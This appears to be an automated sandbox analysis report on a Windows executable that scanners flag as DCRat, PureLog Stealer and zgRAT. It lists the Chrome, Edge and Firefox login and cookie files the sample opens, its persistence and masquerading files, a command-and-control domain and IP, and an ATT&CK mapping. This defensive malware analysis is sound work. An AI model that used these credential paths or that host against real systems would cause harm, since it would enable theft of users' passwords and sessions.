                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Stealing of Sensitive Information

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.1813554604.000000001360B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 4si9noTBNw.exe PID: 7596, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 8420, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 4si9noTBNw.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.4si9noTBNw.exe.f60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1668520663.0000000000F62000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\Public\AccountPictures\winlogon.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Defender\en-GB\conhost.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: 4si9noTBNw.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.4si9noTBNw.exe.f60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\Public\AccountPictures\winlogon.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Defender\en-GB\conhost.exe, type: DROPPED
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                            Remote Access Functionality

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.1813554604.000000001360B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 4si9noTBNw.exe PID: 7596, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 8420, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 4si9noTBNw.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.4si9noTBNw.exe.f60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1668520663.0000000000F62000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\Public\AccountPictures\winlogon.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Defender\en-GB\conhost.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: 4si9noTBNw.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.4si9noTBNw.exe.f60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\Public\AccountPictures\winlogon.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\Windows Defender\en-GB\conhost.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts11
                            Windows Management Instrumentation                            		1
                            Scripting                            		1
                            DLL Side-Loading                            		11
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		2
                            File and Directory Discovery                            		1
                            Taint Shared Content                            		11
                            Archive Collected Data                            		1
                            Encrypted Channel                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault AccountsScheduled Task/Job1
                            DLL Side-Loading                            		11
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory124
                            System Information Discovery                            		Remote Desktop Protocol1
                            Data from Local System                            		2
                            Non-Application Layer Protocol                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt21
                            Registry Run Keys / Startup Folder                            		21
                            Registry Run Keys / Startup Folder                            		2
                            Obfuscated Files or Information                            		Security Account Manager211
                            Security Software Discovery                            		SMB/Windows Admin Shares1
                            Clipboard Data                            		12
                            Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                            Software Packing                            		NTDS1
                            Process Discovery                            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading                            		LSA Secrets141
                            Virtualization/Sandbox Evasion                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            File Deletion                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items33
                            Masquerading                            		DCSync1
                            Remote System Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                            Virtualization/Sandbox Evasion                            		Proc Filesystem1
                            System Network Configuration Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                            Process Injection                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571653 Sample: 4si9noTBNw.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 65 306039cm.nyashcrack.top 2->65 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Antivirus detection for URL or domain 2->75 77 17 other signatures 2->77 8 4si9noTBNw.exe 11 32 2->8         started        12 4si9noTBNw.exe 2->12         started        15 winlogon.exe 2 2->15         started        17 12 other processes 2->17 signatures3 process4 dnsIp5 49 C:\Users\user\Desktop\nocldQFM.log, PE32 8->49 dropped 51 C:\Users\user\Desktop\hEXMkWTV.log, PE32 8->51 dropped 53 C:\Users\user\Desktop\exZDPEZZ.log, PE32 8->53 dropped 63 12 other malicious files 8->63 dropped 87 Creates an undocumented autostart registry key 8->87 89 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 8->89 91 Creates multiple autostart registry keys 8->91 101 2 other signatures 8->101 19 cmd.exe 8->19         started        22 csc.exe 4 8->22         started        25 powershell.exe 8->25         started        27 5 other processes 8->27 67 306039cm.nyashcrack.top 37.44.238.250, 49736, 49737, 49738 HARMONYHOSTING-ASFR France 12->67 55 C:\Users\user\Desktop\xWYkXXxo.log, PE32 12->55 dropped 57 C:\Users\user\Desktop\hMjNZkhU.log, PE32 12->57 dropped 59 C:\Users\user\Desktop\YdQxpHbm.log, PE32 12->59 dropped 61 C:\Users\user\Desktop\OuwhFfWF.log, PE32 12->61 dropped 93 Tries to harvest and steal browser information (history, passwords, etc) 12->93 95 Antivirus detection for dropped file 15->95 97 Multi AV Scanner detection for dropped file 15->97 99 Machine Learning detection for dropped file 15->99 69 127.0.0.1 unknown unknown 17->69 file6 signatures7 process8 file9 79 Uses ping.exe to sleep 19->79 81 Uses ping.exe to check the status of other devices and networks 19->81 43 4 other processes 19->43 47 C:\Windows\...\SecurityHealthSystray.exe, PE32 22->47 dropped 83 Infects executable files (exe, dll, sys, html) 22->83 29 conhost.exe 22->29         started        31 cvtres.exe 1 22->31         started        85 Loading BitLocker PowerShell Module 25->85 33 conhost.exe 25->33         started        35 WmiPrvSE.exe 25->35         started        37 conhost.exe 27->37         started        39 conhost.exe 27->39         started        41 conhost.exe 27->41         started        45 2 other processes 27->45 signatures10 process11

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            4si9noTBNw.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            4si9noTBNw.exe100%AviraHEUR/AGEN.1323342
                            4si9noTBNw.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\Desktop\JzShoUtR.log100%AviraTR/AVI.Agent.updqb
                            C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe100%AviraHEUR/AGEN.1323342
                            C:\Users\Public\AccountPictures\winlogon.exe100%AviraHEUR/AGEN.1323342
                            C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe100%AviraHEUR/AGEN.1323342
                            C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe100%AviraHEUR/AGEN.1323342
                            C:\Users\user\AppData\Local\Temp\csCDqY6YZN.bat100%AviraBAT/Delbat.C
                            C:\Program Files\Windows Defender\en-GB\conhost.exe100%AviraHEUR/AGEN.1323342
                            C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe100%Joe Sandbox ML
                            C:\Users\Public\AccountPictures\winlogon.exe100%Joe Sandbox ML
